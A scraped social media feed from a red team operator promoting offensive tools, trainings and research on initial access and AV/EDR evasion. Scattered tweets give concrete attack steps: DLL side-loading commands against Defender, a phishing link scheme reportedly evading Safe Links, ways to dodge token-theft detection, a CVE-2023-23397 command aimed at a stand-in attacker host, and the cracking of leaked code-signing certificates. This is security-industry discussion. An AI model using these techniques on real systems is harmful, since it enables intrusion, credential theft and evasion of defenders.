mgeeky | Mariusz Banach Profile Banner
mgeeky | Mariusz Banach Profile
mgeeky | Mariusz Banach

@mariuszbit

Followers
11,735
Following
634
Media
115
Statuses
1,178

🔴 Red Team operator, ex-MWR/F-Secure pentester, ex-AV engine developer @ESET , green tea addict. 🫖 @mgeeky @infosec .exchange

Polska
Joined March 2016
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@mariuszbit
mgeeky | Mariusz Banach
1 year
🔥 Had a blast today presenting "Desperate Infection Chains" talk @x33fcon , touching on complex infection chains and code signed threats. ☢ In case you're interested - sharing my slide deck below: Let me know what you think & enjoy! 😎
Tweet media one
Tweet media two
11
94
291
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ I'm so excited - just issued my first blog post☢️ As promised - sharing my @WarConPL slides deck on: Power of positive feedback made me publish them during my first day of holidays (●'◡'●) Let me know if you like it 🔥
Tweet media one
40
320
764
@mariuszbit
mgeeky | Mariusz Banach
2 years
💎 Can't count in how many Active Directory audits this monstrous Cypher query helped me swiftly collect stats of a #BloodHound collection!⚡ Simply Find & Replace "" w/ your target domain aaaand you have it Helpful? Lemme know!💀
Tweet media one
9
172
603
@mariuszbit
mgeeky | Mariusz Banach
3 years
Recently I started digging into Office365 Anti-Spam & spent a lot of time decoding and comprehending SMTP headers. Results are already satisfying: 10+ SFS/ENG rules "reverse-engineered"! You're on a phishing now? Give my a ride!
Tweet media one
Tweet media two
Tweet media three
Tweet media four
7
194
598
@mariuszbit
mgeeky | Mariusz Banach
3 years
Microsoft blocks VBA macros originating from Internet based on MOTW flag. I'm now sharing a tool presenting risk for MOTW bypasses, which will play crucial role in evading MS default setting and smuggle macros back in. Threat Actors already do that.
Tweet media one
Tweet media two
5
194
529
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210) 1. if doc has MOTW, macros are disabled. 2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled ISOs are no longer effective containers for MOTW evasion. However, bundling payloads into LNK is 🔥
Tweet media one
Tweet media two
5
168
499
@mariuszbit
mgeeky | Mariusz Banach
3 years
Ever wanted to hide from memory scanners like Moneta or Pe-Sieve just like @MDSecLabs Nighthawk C2 does? Here's a PoC for that powerful in-memory evasion trick: It's not brand new, nothing I devised myself only a sample implementation to show technique.
4
166
428
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔥Working hard on a public release of my Malware Dev CI/CD toolkit ☢️ProtectMyTooling - Multi-Packer, supporting 23+ obfuscators ☢️RedBackdoorer - PE shellcode injection via 6 techniques ☢️RedWatermarker - IOC injector for implants tracking Already available to my sponsors 😁✨
Tweet media one
Tweet media two
Tweet media three
9
109
411
@mariuszbit
mgeeky | Mariusz Banach
2 years
🦠If you wish to understand what's causing your AMSI detection - whether VBA or WSH, you might check out Matt Graeber's @mattifestation AMSITools.ps1. I crafted up HOWTO and a helper script that uses his brilliant work to pull AMSI events:
Tweet media one
Tweet media two
5
161
405
@mariuszbit
mgeeky | Mariusz Banach
1 year
Game cheaters don't get along with Red Teamers very well 😭
Tweet media one
33
55
392
@mariuszbit
mgeeky | Mariusz Banach
2 years
Can confirm - a nice DLL side-loading against Defender's executable. Step 1: copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public Step 2: g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp Step 3: "%WinDir%\Users\Public\NisSrv.exe" Tasty Initial Access 🔥
@Sh0ckFR
Sh0ck
2 years
Ladies and gents: A DLL Hijacking is present in mpclient.dll also BINARY: "C:\Program Files\Windows Defender\NisSrv.exe" If you are a blue-teamer, do not watch only “MpCmdRun.exe” but all binaries from Defender. PoC: #infosec
Tweet media one
10
131
344
7
117
377
@mariuszbit
mgeeky | Mariusz Banach
3 years
And it now landed! A PoC implementation of Thread Stack Spoofing being an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocations from scanners and analysts. Inspired by marvelous @MDSecLabs Nighthawk C2!
Tweet media one
4
130
369
@mariuszbit
mgeeky | Mariusz Banach
3 years
😶‍🌫️While working on @nikhil_mitt outstanding Azure Red Team course I've developed a handy powershell toolkit combining various Azure Red Team tactics. Sharing it now, maybe someone will find it useful✨
4
137
362
@mariuszbit
mgeeky | Mariusz Banach
2 years
IMAP Password lying out there in Registry in DPAPI-encrypted form. Worth adding Seatbelt collection support? :-) HKLM\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Simple CryptUnprotectData() will do to decrypt it.
Tweet media one
5
106
355
@mariuszbit
mgeeky | Mariusz Banach
1 year
☢️ClickOnce + AppDomain Manager Injection (aka signed EXE + DLL sideloading) is the new Initial Access Hotness❤️ Check out @zyn3rgy and @0xthirteen insights on weaponising them: Pssst. there's a training & framework already scratching that surface too🥳
4
126
355
@mariuszbit
mgeeky | Mariusz Banach
2 years
- "... and then he said to sign my malware.exe with faked Microsoft cert to evade AVs/EDRs. Would you believe?" ( ̄y▽ ̄)╭ Ohohoho..... Sign-Artifact.ps1 - based on @mattifestation research & implementation shamelessly borrowed here:
Tweet media one
2
102
342
@mariuszbit
mgeeky | Mariusz Banach
1 year
🔥 Wow, this looks really neat! x64 binary obfuscator, written for uni project. Can't wait to take it for a spin:
7
97
335
@mariuszbit
mgeeky | Mariusz Banach
3 years
Probably forgotten URI scheme that may come handy in Phishing engagements ¯\_(ツ)_/¯ 1. Create your phishing e-mail 2. Add hyperlink to: ms-excel:ofe|u| 3. Send it away. Slips through Defender for O365 and Safe Links :-)
1
85
333
@mariuszbit
mgeeky | Mariusz Banach
2 years
Nice! LNK-ISO polyglot weaponisation idea: 1. Create LNK that copies & renames itself to ISO 2. Create LNK-ISO polyglot with @angealbertini Mitra 3. Double-click on LNK -> will pop with ISO's contents 4. Rename polyglot back to poly.lnk Double-click & ISO pops up ✨ @domchell
Tweet media one
Tweet media two
Tweet media three
Tweet media four
14
97
320
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Recently we started seeing Threat Actors abusing MSI Windows Installation files for Initial Access & code execution 🔥 I now release Part 1 insights into how MSIs can be abused, PoCs for 🔴 & dissection utility for 🔵 🦠 Let me know what you think!
4
116
318
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️Just released MSISnatcher: tool that backdoors legitimate MSI installers with a few code execution vectors! 🔥Probably the only publicly available tool demonstrating various ways for backdooring MSI Already available to my awesome Github supporters :)
Tweet media one
Tweet media two
3
94
318
@mariuszbit
mgeeky | Mariusz Banach
2 years
Yay! 🔥 ProtectMyTooling has now a cute GUI ^.^
Tweet media one
8
42
270
@mariuszbit
mgeeky | Mariusz Banach
1 year
☢️MSI leaked code signing certificate already abused by Threat Actors (expires in 2024). I've collected 9 recently leaked certificates to cover up in upcoming Modern Initial Access training sessions🔥 👾 Already weaponised in Red Macros Factory 1.8!
Tweet media one
Tweet media two
2
104
274
@mariuszbit
mgeeky | Mariusz Banach
2 years
Yay! I'll be sharing some Red Team delights on Initial Access and Evasion during tomorrow's WarCon! 🔥 Slide deck ready on yummy dirty tricks we've been using :-)
Tweet media one
9
24
261
@mariuszbit
mgeeky | Mariusz Banach
2 years
Did you know we can use Nuitka Commercial compiler to turn Python into EXE with anti reverse-engineering baked in? It obfuscates strings, avoids dropping source code to TEMP, applies simple debugger detection. #Mythic Medusa.exe @ajpc500 anyone?😎
Tweet media one
Tweet media two
9
61
262
@mariuszbit
mgeeky | Mariusz Banach
2 years
Hey #RedTeam folks! Any ideas for a stable, usable open-source Protector/Compressor/Packer/Shellcode converter anything I might add to ProtectMyTooling out there? 😊 Shellcode, PE, .NET? sRDI, MPRESS are already in the pipeline! So far I've got 24 "packers" supported!
Tweet media one
15
48
247
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔥 Just finished my very first online training on Modern Red Team Malware Tactics. Feeling exhausted but very pumped! Especially seeing attendees satisified with contents! 😀 Anyone would be interested in joining a next session? 😀
Tweet media one
21
23
245
@mariuszbit
mgeeky | Mariusz Banach
3 years
Just shared a handy Spam SMTP headers decoder: If you struggle with Phishing e-mail delivery, you parse manually all those Office365 headers - give that script a go! Let me know if there are any other SMTP Spam headers worth auto-parsing.
Tweet media one
Tweet media two
Tweet media three
3
73
242
@mariuszbit
mgeeky | Mariusz Banach
1 year
Revamping my ☢️ Modern Initial Access training feels soo good! Next week's @x33fcon session will be a blast! - Nuked away VBA slides - 10 leaked code signing certs & abuse guidance - Signed & weaponised MSIX - Signed ClickOnce (hopefully!)🤞 - plenty of Complex Infection Chains
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
40
226
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Agenda of my Modern Red Team Malware Development training that I'm running at @x33fcon next week - almost ready. Just a few final touches! I already feel like there won't be enough time to cover everything I'd like over 3 days. A month would do tho! What do you think?💀
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
40
226
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ If you missed my @x33fcon talk's slides & you're curious checking out on updated "Modern Initial Access & Evasion Tactics" deck, have a look here: Let me know what you think! ^.^
5
72
223
@mariuszbit
mgeeky | Mariusz Banach
1 year
☢️ Just coded up a little PoC for anyone interested in taking search-ms URI handler for a spin :-) This could be used to initiate Complex Infection chain: Email -> URL -> landing page -> Explorer -> LNK/CHM/MSI
@blackorbird
blackorbird
1 year
Phishing emails making use of the "search-ms" URI protocol handler to download malicious payload. ClickOnce APT Group also use these technology. <script> window.location.href = 'search-ms:query=Review&crumb=location: \\\\domain @SSL \
Tweet media one
Tweet media two
2
163
422
9
84
215
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔥Lots of updates on my Github - PackMyPayload: --hide now works with ZIPs & supports wildcards - ProtectMyTooling: upgraded donut, GUI in .pyw Sponsorware: - smuggler: dropbox, new placeholders & more - BOFNET: thread-safe patchless evasions, keylogger, screenshotter Enjoy ♥️
Tweet media one
Tweet media two
Tweet media three
6
50
207
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Backdooring Office Structures. Part 2: Payload Crumbs In Custom Parts I've just released an article describing a new* method for stealthily hiding malware in doc structures: Custom XML Parts. * as far as I'm concerned, let me know if I'm mistaken!
Tweet media one
1
69
205
@mariuszbit
mgeeky | Mariusz Banach
3 years
So my tells me there is quite a bunch of %WINDIR% exeutables calling out to MiniDumpWriteDump. I wonder how many of them (if any) have target PID externally controlable or could be easily instrumented (via DebugActiveProcess?)🤔
Tweet media one
1
41
200
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Updated my Modern Initial Access and Evasion Tactics slide deck by adding one more slide (20th) on VBA Macros in MS Project and MS Visio + updated list of offensively abusable extensions (slide 27th). We'll cover their offensive use during upcoming @x33fcon training 🔥
Tweet media one
Tweet media two
2
54
201
@mariuszbit
mgeeky | Mariusz Banach
3 years
Thread Stack Spoofing ala @MDSecLabs Nighthawk C2 turns out not that hard to implement :) 1. hook Sleep, SymInitialize 2. walk thread call stack w/ StackWalk64 3. Save orig. frame and return addresses (RBP, RIP) 4. Overwrite *(RBP+sizeof(void*)) = fakeRetAddr 5. Sleep 6. Restore
Tweet media one
4
52
200
@mariuszbit
mgeeky | Mariusz Banach
3 years
Couldn't believe that such an old trick such as Right-To-Left Override (dated back to 2009!) is still a threat nowadays. So I weaponized it in a simple Python script - and it works :-( Script available here: Ref:
Tweet media one
Tweet media two
@ffforward
Tommy M (TheAnalyst)
3 years
I have observed a recent uptick in html attachments abusing "Right-to-Left override" Unicode in the file name, for example the recent Oauth #phishing consent campaign. This is a good detection opportunity that MDO seems to miss, so please check your environment. Regex "\u202E"
Tweet media one
Tweet media two
6
52
139
1
56
178
@mariuszbit
mgeeky | Mariusz Banach
3 years
I wanted to find a MS Office DLL that exported a specific symbol. So I written a script that recursively scans PE imports/exports and prints them nicely: Example pic shows Exports in Office DLLs which names indicate they might exec something. Enjoy :)
Tweet media one
2
47
166
@mariuszbit
mgeeky | Mariusz Banach
2 years
It takes two lines to exploit CVE-2023-23397 via Outlook COM🙃 🎃Coming as a treat for my supporting sponsors: that's now implemented in my Carbuncle fork 👾 ❤️bofnet_jobassembly carbuncle send [...] /badappointment:\\attacker @8080 \foobar Check it out:
Tweet media one
Tweet media two
4
27
143
@mariuszbit
mgeeky | Mariusz Banach
1 year
On the hunt for CS certs🤖 1. Pulled 1500+ .pfx/.p12 certs exposed on publicly accessible cloud storages (s3, blobs) 2. Cracking in progress, but already got 25 Code Signing ones decrypted 3. No joy though, all of them expired😭 I noticed mostly Apple Developer certs get leaked
Tweet media one
Tweet media two
Tweet media three
5
29
123
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Backdooring Office Structures. Part 1: The Oldschool I've just published a blog post touching on different payload hiding strategies within macro-enabled Office documents. First part touches on basics, whilst the Part 2 will reveal my novel technique
2
52
132
@mariuszbit
mgeeky | Mariusz Banach
2 years
✨Support for @chvancooten NimPackt-v1 added to #ProtectMyTooling ✨ Now a straightforward .NET Executable/Shellcode loading with Cas' Nim harness is a breeze & can be automated! I'm still pollishing ProtectMyTooling before public release, stay tuned! 🔥
Tweet media one
2
27
130
@mariuszbit
mgeeky | Mariusz Banach
2 years
ProtectMyTooling + BOFNET =❤️ Did you know that ProtectMyTooling can integrate with BOFNET and ease evasion pain? Below target was running MDE EDR. Despite BOFNET's patchless AMSI+ETW evasions, assembly was still being picked up until we protected it👾
Tweet media one
Tweet media two
Tweet media three
1
46
124
@mariuszbit
mgeeky | Mariusz Banach
2 years
Now that I'm back from holidays (that took longer than I expected) 🏝️ I added @wdormann 's CVE-2022-41091 abusing ZIP-based MOTW bypass to PackMyPayload :-) If you haven't yet got a chance to play with it, try it out: py evil.xlsm
Tweet media one
2
41
123
@mariuszbit
mgeeky | Mariusz Banach
2 years
🌶️ is no longer viable mean for running commands from the grounds of VBA. Defender's Attack Surface Reduction rules nicely thwarts it (through AMSI). So instead, Red Teamers may get back to basics with: Shell "calc", 0 Which works just fine ¯\_(ツ)_/¯
Tweet media one
Tweet media two
3
46
123
@mariuszbit
mgeeky | Mariusz Banach
2 years
MS Defender for Endpoint detects Primary Refresh Token (PRT) extraction based on ProcessCreate event with BrowserCore.exe Guess what? Copy BrowserCore.exe to %TEMP%\random.exe - no more detections ¯\_(ツ)_/¯ Got it implemented in my sponsorware SharpPRT for anyone intersted :)
Tweet media one
Tweet media two
Tweet media three
1
28
125
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔥Support for SVG Smuggling added to ✨Helluva last few weeks been for me! Tons of goodies added to Red Macros Factory () & millions hours to get ready for Initial Access training !
Tweet media one
2
32
122
@mariuszbit
mgeeky | Mariusz Banach
1 year
ClickOnce deployments leave *a lot* of artifacts in file system and registry. For testing purposes, I came up with a trivial cleanup script removing most of their leftovers: This should help you: 🟣testing, 🔴covering up your traces 🔵or hunting🤠
Tweet media one
0
51
112
@mariuszbit
mgeeky | Mariusz Banach
11 months
One of my favorite sneaky ways to get indirect code execution lately! 🤠 @MrUn1k0d3r collected quite extensive list, nice job! If you're interested in seeing tool mentioned by @n00bRage - drop me a line :)
1
26
106
@mariuszbit
mgeeky | Mariusz Banach
3 years
Hmm.. .WMZ is a Windows Media Player skin file. It's simply a ZIP containing JScript + WMS (XML) and bunch of images. Couldn't code exec, probs ActiveXObject loading disabled or something :-/ Leaving for curious ones www.exploit-db[.]com/exploits/20424
Tweet media one
Tweet media two
3
32
103
@mariuszbit
mgeeky | Mariusz Banach
2 years
🙃Finally... After two weeks of hardcore programming I now added a stable Javascript/JScript/JXA/Python obfuscation on top of existing VBA/VBS that my Red Macros Factory obfuscator supported so far. Stay tuned for RMF 1.7.1❤️ Defender for MacOS clueless about thy apfells!👾
Tweet media one
1
13
97
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔥 Want to learn cool Initial Access tactics, practice successful malware strategies? I'll be giving 3 days long online training on the matter (30 Nov - 2 Dec). 🌶 Expect course full of spicy hands-on, samples, tooling and guidance on RT malware design!
@x33fcon
/ˈziːf-kɒn/
2 years
Long-awaited training now online! Check this out: "Modern Red Team Malware Development Strategies" by Mariusz Banach ( @mariuszbit ) Register today 🎟️
Tweet media one
1
6
24
5
17
95
@mariuszbit
mgeeky | Mariusz Banach
2 years
Looks like there's more to the OneDrive DLL Hijacking story than meets the eye🧐 @Octoberfest73 However, similarly to MS Teams, I noticed that OneDrive starts either from %LOCALAPPDATA% or %PROGRAMFILES%, depending on whether its an Enterprise or consumer installation.
Tweet media one
Tweet media two
4
23
86
@mariuszbit
mgeeky | Mariusz Banach
8 months
🔥Life's Tough but Good🔥 Last few months really kicked me hard. Had to push back on socials (X, Slack, Github): ✔️Quit the job ✔️Had a severe injury ✔️Bought a house & renovated it myself ✔️Ran more trainings I could chew ✔️Had to prepare to become a Dad! ETA <2 weeks now👶 1/
14
3
93
@mariuszbit
mgeeky | Mariusz Banach
3 years
Do you know that community now opts for running their .NET assemblies in-process ("inlined")? My Cobalt Strike mgeekys_arsenal.cna now brings a handy interface for using one of @anthemtotheego InlineExecute-Assembly & @med0x2e ExecuteAssembly BOFs
Tweet media one
Tweet media two
3
26
85
@mariuszbit
mgeeky | Mariusz Banach
1 year
Mimikatz Signed (39/69) vs Unsigned (46/64) Products ruled out by MSI code signature: - Acronis (Static ML) - Avira (no cloud) - ClamAV - F-Secure - Gridinsoft (no cloud) - Trapmine - ZoneAlarm by Check Point Conclusion: valid signature presence doesn't evade modern scanners❤️
Tweet media one
4
18
74
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔴Red Teams: go custom or go home. Tool customisation is a key differentiator telling novice from experienced teams apart. I fell into exactly that trap few years back with BloodHound.bin cache file (●'◡'●)
@cyb3rops
Florian Roth
2 years
Detection Magic 🥳
Tweet media one
Tweet media two
4
39
242
1
19
74
@mariuszbit
mgeeky | Mariusz Banach
2 years
A single slide from my Malware Development training @x33fcon . Suprising how widespread VBA actually is. 💀 ☢️ Anyone fancy trying out VBA for: - Terminal emulator serving critical systems, - CAD projects of military equipment, - SCADA consoles
Tweet media one
1
14
74
@mariuszbit
mgeeky | Mariusz Banach
2 years
How one should feel about seeing an almost 1-to-1 "clone" of his own tool? I feel like authors of RedGuard snatched RedWarden's diagram, "UI" & other bits ¯\_(ツ)_/¯ Not that it bugs me, I wanted to see superior implementation anyway, it just feels awkward to see a near clone
Tweet media one
3
23
72
@mariuszbit
mgeeky | Mariusz Banach
3 years
One Unicode to Blind Them All - enrich LOLBINs with toxic unicode bytes to fool around with process command line property in windows event logs -> make thy SIEMs go blind. Kudos to @AndreGironda for letting me know :-)
2
29
72
@mariuszbit
mgeeky | Mariusz Banach
2 years
One file format offers terrific automation & evasion characteristics, beautifully helps in Initial Access and hasn't been that much explored by RT community I'm now weaponising it for framework & training needs ✨ 1da3a93d1bd298aa75a9fd7498912ba90c7904ca3aa2c4e3485ef12b27589731
3
10
72
@mariuszbit
mgeeky | Mariusz Banach
3 years
Just released hugely simplified implementation: *((PULONG_PTR)_AddressOfReturnAddress()) = 0; Simply overwriting return address with 0 cuts the call stack. This seems to be just enough ¯\_(ツ)_/¯ image1: our call stack image2: Total Commander call stack
Tweet media one
Tweet media two
3
25
72
@mariuszbit
mgeeky | Mariusz Banach
1 year
Getting ready for @x33fcon ! 🔥 (ekh. ekh. I *am* trying my best at meming, alright?) Super hyped to meet all folks and rant how much Red Teams suck and sharing malware is a felony🤣 Super hard to resist myself from adding more slides than I can walk through 😭
Tweet media one
Tweet media two
4
11
72
@mariuszbit
mgeeky | Mariusz Banach
2 years
Mmmm smells like phish-to-persist opportunity : -) How about phishy MSI dropping a DLL there onto WindowsApps (genuinely used by .MSIXes)? That'd look rock solid to even seasoned analysts!
@Octoberfest73
Octoberfest7
2 years
I'm sure i'm late to the party, but MSFT put a user-writable folder in $path (%HOMEPATH%\Appdata\Local\Microsoft\ WindowsApps)??? OneDrive tries to load a non-existant DLL (Microsoft.UI.Xaml.XamlTypeInfo.dll) making for an easy user-level hijack #malware #redteam #cybersecurity
Tweet media one
11
101
401
0
11
72
@mariuszbit
mgeeky | Mariusz Banach
3 years
now produce a good-looking HTML report! :) Make sure to check out the latest script version!
Tweet media one
1
19
71
@mariuszbit
mgeeky | Mariusz Banach
2 years
Interesting statistics to watch out for from open-source OST developer point of view: #Havoc repo has: - 100 issues - 25 PRs That makes 4x more complaints than public contributions🙃 @C5pider hang in there buddy, don't give up - we all see how hard you keep on pushing there!
4
8
65
@mariuszbit
mgeeky | Mariusz Banach
2 years
Just finished N-days intense crunch on coding, prototyping, blogging. Now ready to release some insights into one of emerging file vectors. @_EthicalChaos_ already had a proof reading and gave me a green light😊 Two Github repos scheduled for public release & a lengthy blogpost
Tweet media one
0
6
59
@mariuszbit
mgeeky | Mariusz Banach
2 years
☢️ Modern Initial Access and Evasion Tactics I'm super delighted to announce that my first 🔴 Red Team training session is booked in full! If you missed its first slot, take a look at others: 📅 February 23-26 📅 April 26-28 ➡️ Register at:
2
6
55
@mariuszbit
mgeeky | Mariusz Banach
1 year
Great write-up on MSI privilege escalations from @pfiatde ! Check it out now while it's hot 🔥
0
11
56
@mariuszbit
mgeeky | Mariusz Banach
2 years
Look Ma, I'm in the Internet teaching about computer viruses ☺️ @x33fcon we're frying brains here :)
@x33fcon
/ˈziːf-kɒn/
2 years
Modern Red Team Malware Development Strategies training with @mariuszbit at #x33fcon It's wild! 🔥 #blueteams - beware 😉 Multitude of techniques beautifully chained 🔗 together - that's what your fellow #redteamers are learning right now 🧑‍🎓
Tweet media one
3
9
53
0
3
54
@mariuszbit
mgeeky | Mariusz Banach
3 years
Microsoft blocks VBA macros by default. At last! Red Teams all around the world - we adapt. ( ͡°( ͡° ͜ʖ( ͡° ͜ʖ ͡°)ʖ ͡°) ͡°) Wonder how that affects WSH scripts unpacked from ISOs, using COM to implant VBA macros into Trusted Locations (AddFromString)?
1
6
52
@mariuszbit
mgeeky | Mariusz Banach
1 year
First day we've been frying brains with heaps of classic initial access TTPs 🧠 Tomorrow we'll be going through lesser known & more relevant ones, including MSIX/APPX 🔥 Dis gon b gud!
@x33fcon
/ˈziːf-kɒn/
1 year
It's a very intense, mind blowing experience with @mariuszbit ! He'll teach you that there is always a way in 🔓🗝️ (and what that way is!) even when it gets desperate 🔥 #x33fcon #training
Tweet media one
Tweet media two
1
3
21
0
6
51
@mariuszbit
mgeeky | Mariusz Banach
1 year
Pupeteering your way to phished user's vaults with @mrgretzky 's Evilnginx 🔥: spawn a browser on attacker's server, paste acquired creds to the legitimate domain instead of relying them. Brilliant! @antisnatchor approves 👌
Tweet media one
1
5
49
@mariuszbit
mgeeky | Mariusz Banach
2 years
And just like that - 2 years long efforts of writing Initial Access and VBA macros generation framework tossed into dumpster, cause ChatGPT comes free of charge😆
@vysecurity
Vincent Yiu - SYON
2 years
Wtf… we’re screwed.
Tweet media one
Tweet media two
6
62
331
1
15
48
@mariuszbit
mgeeky | Mariusz Banach
2 years
Been busy last days enhancing @_EthicalChaos_ PR by William Knowles Now my ver stabily runs multiple .NET assemblies in jobs + applies Ccob's patchless AMSI bypass Complete tranisition from execute-assembly fork&run to inline! Will release soon (*^_^*)
Tweet media one
Tweet media two
4
13
47
@mariuszbit
mgeeky | Mariusz Banach
2 years
Looks like my work came useful to Cobalt Strike wizards✨I'm flattered!
@gregdarwin
Greg Darwin
2 years
The Cobalt Strike research team just released a new Thread Stack Spoofing tool to the Cobalt Strike Arsenal. Details here:
5
105
280
2
1
48
@mariuszbit
mgeeky | Mariusz Banach
1 year
@securityfreax 100% agree. These folks are making money from their ingenuity in bypassing anti-cheat systems, that in turn are far more aggressive and invasive compared to EDRs/AVs. Just as it was with Direct Syscalls, malware gangs and cheaters had this tech long before infosec! 🤠
1
2
46
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔴 PoCs related: 🔵Dissection utility - : 🎓 Moreover, I'd like to announce that my Modern Initial Access & Evasion Tactics training is now open for registration! More details here:
1
7
46
@mariuszbit
mgeeky | Mariusz Banach
2 years
Looks handy! 👀 For those who would favor CLI utility doing the same thing, I've got that came useful to me in numerous occasions:
@securityfreax
🅰🅳🅼
2 years
WinAPi Search - Search a single or multiple binary PE files by Win32 function name.
Tweet media one
6
225
765
0
14
45
@mariuszbit
mgeeky | Mariusz Banach
10 months
🔥 Having some hard time with Initial Access during your gigs? Join the February☢️Modern Initial Access and Evasion Tactics☢️ training round and dive deep into lesser known arcanes of common file vectors! Class trusted by many experienced fellow RTerz!
@au5_mate
Sean 🏴󠁧󠁢󠁳󠁣󠁴󠁿
10 months
Just finished up @mariuszbit 's initial access course. Despite being well-versed in the topic beforehand, I learned some awesome new tips and tricks, and gained some further knowledge of concepts that I just hadn't reached the same depth of understanding of before the course.
0
0
4
0
9
43
@mariuszbit
mgeeky | Mariusz Banach
2 years
So, looks like I'll be speaking at @x33fcon this year with. :) Will throw in a few decent evasion tricks that we use in our RTs. If you plan to attend, come and say hi :-)
Tweet media one
0
3
41
@mariuszbit
mgeeky | Mariusz Banach
1 year
Smells like poor man's Phish in Excel? DNS exfil seems doable, though hardly many visually appealing ways to extort some infos from users. Maybe =INFO(...) could make it bit more dope? This could also be used as a canary telling whether user previewed our phishy sheet🤔
Tweet media one
Tweet media two
2
10
41
@mariuszbit
mgeeky | Mariusz Banach
2 years
@jaredcatkinson serie "On Detection: Tactical to Functional" is the most insightful research I read this year🎖️ The approach to methodologically decompose Procedures into further layers is just🤯🤯 If you haven't seen it yet: waste no minute, catch up ✨
Tweet media one
Tweet media two
1
6
41
@mariuszbit
mgeeky | Mariusz Banach
2 years
🔥 Whooah, that's a really huge update to #CobaltStrike 4.7: enormous efforts made by @gregdarwin & Team, who once again pushed the Adversary Emulation industry by giving us: SOCKS5, more BOFs memory mgmt primitives, greatly increased Sleep Mask size! 🔥
1
3
40
@mariuszbit
mgeeky | Mariusz Banach
3 years
@ElliotKillick Thanks Elliot for letting us know! Looks like there're 370+ executables calling out to ShellExecuteW similarly to WorkFolders. There must be more to uncover, gotta hunt for them myself too :)
Tweet media one
2
2
39
@mariuszbit
mgeeky | Mariusz Banach
2 years
Just updated both - EvilClippy by @StanHacked - OfficePurge by @AndrewOliveau to enhance their support for: - Word (pre-2007, 2007+) - Excel (pre-2007, 2007+) - Powerpoint (2007+) - Publisher (pre-2007) PRs sent. Cheers :-)
0
10
37
@mariuszbit
mgeeky | Mariusz Banach
2 years
@cyb3rops Hey, @cyb3rops I'm gonna tell a little secret they don't want you to know. Guys treating adversary emulation discipline seriously, are already walking in blue shoes, advising, wargaming, auditing & helping reshape existing detections (rules, use cases). You need to calm down. :)
4
1
36
@mariuszbit
mgeeky | Mariusz Banach
2 years
Reproduce with: ... or with privately distributed Initial Access framework ❤️ (only for thoroughly vetted, legitimate security consultancy vendors/Teams). Send me DM if you want to learn more. 🤠
2
4
37
@mariuszbit
mgeeky | Mariusz Banach
3 years
@0gtweet Windows Defender's WdFilter.sys has these files hardcoded in its .rdata section. They may be able to download Mimikatz exe, but as soon as it gets accessed - Defender will remove it (as expected). Be wary about that! 3rd image proves downloads. Script:
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
8
36
@mariuszbit
mgeeky | Mariusz Banach
2 years
Just received my #flipperzero - super pumped to learn all the things on radio hacking! It's been a long time I've captured garage pilot signal with arduino and 3$ antenna. Time flies, now we leave it for Dolphins I guess 😅
Tweet media one
Tweet media two
3
2
33
@mariuszbit
mgeeky | Mariusz Banach
2 years
Lets hide DPAPI BLOB so that Benjamin won't snatch it. Ideas? Round of a XOR 1-byte over blob will do the trick! Few weeks later... Mimikatz "aint-no-creds-hiding-from-me" v3 ¯\_(ツ)_/¯ Kudos @gentilkiwi !
@gentilkiwi
🥝🏳️‍🌈 Benjamin Delpy
2 years
Always fabulous to see editors low the Windows Security level When Citrix SSO is enabled... passwords are stored in *user processes* (in addition to system ones) Ho yeah, *even if you have Credential Guard* Yeah, that's what Citrix is calling "SSO" > Will be in #mimikatz 3 🥝
17
311
845
1
7
35
@mariuszbit
mgeeky | Mariusz Banach
2 years
@campuscodi It might be worth mentioning here alternative implementation, which authors used as a foundation:
Tweet media one
0
8
34
@mariuszbit
mgeeky | Mariusz Banach
2 years
MFAs beware: Evilginx is gonna snatch ya!🔥
@mrgretzky
Kuba Gretzky
2 years
BREAKING: Evilginx is coming back! 🔥🪝🐟 Coming soon: - Evilginx 3.0 Release - Evilginx Mastery online course with hands-on training lab access Sign up here to know when it drops! 📩
Tweet media one
38
184
647
0
7
34
@mariuszbit
mgeeky | Mariusz Banach
2 years
💣 Latest in Pass-The-Ticket 💣 Silver Ticket -> Golden -> even goldier Diamond Ticket Brought by @exploitph & @4ndr3w6S - amazing work!
@harmj0y
Will Schroeder
2 years
It's hard for me to convey how cool the "Diamond Ticket" implementation from @exploitph & @4ndr3w6S (based on work from @TalBeerySec & @chernymi ) really is. This is a "I wish I would have thought of it" type of idea that was implemented elegantly by Charlie and Andrew 1/2
1
31
84
0
13
34
@mariuszbit
mgeeky | Mariusz Banach
2 years
🙈🙊🙉Soon I'll be burning TTPs💔 Hoped to keep them secret for a longer while, but recently TAs started catching up and I'm motivated to outrun them by releasing tech details & samples. Hopefully security vendors & defensive community will swiftly come up with rulesets & optics
@mariuszbit
mgeeky | Mariusz Banach
2 years
Blog post will land hopefully in a month :-( Too much on my plate lately...
0
0
4
2
1
29
@mariuszbit
mgeeky | Mariusz Banach
1 year
@ShitSecure is rocking the stage @x33fcon with his Cat&Mouse game talk!
Tweet media one
0
5
32